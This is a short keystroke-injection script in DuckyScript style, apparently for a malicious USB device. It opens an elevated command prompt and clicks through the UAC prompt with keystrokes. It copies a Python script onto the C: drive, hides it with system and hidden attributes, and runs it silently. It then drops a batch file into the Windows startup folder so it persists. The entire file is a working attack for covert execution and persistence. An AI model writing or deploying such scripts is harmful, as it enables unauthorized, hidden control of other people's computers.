DELAY 2000
Alt f4
GUI r
DELAY 1000
STRING cmd
DELAY 1000
CTRL SHIFT ENTER
DELAY 2000
SHIFT Tab
DELAY 1000
ENTER
DELAY 2000
STRING copy d:\main.py c:\main.py
DELAY 500
ENTER
DELAY 3000
STRING Attrib +h +s "c:\main.py"
DELAY 500
ENTER
DELAY 1000
STRING pythonw.exe c:\main.py
ENTER 
DELAY 5000
STRING exit
ENTER

DELAY 2000
GUI r
DELAY 500
STRING shell:startup
DELAY 500
ENTER
DELAY 1000
F4
DELAY 500
CTRL c
DELAY 500 
ALT F4

DELAY 2000
GUI r
DELAY 1000
STRING cmd
DELAY 1000
CTRL SHIFT ENTER
DELAY 2000
SHIFT Tab
DELAY 1000
ENTER
DELAY 2000
STRING copy D:\pop.bat "
DELAY 500
CTRL v
DELAY 500
STRING \pop.bat"
DELAY 500
ENTER
DELAY 2000
STRING exit
DELAY 500
ENTER

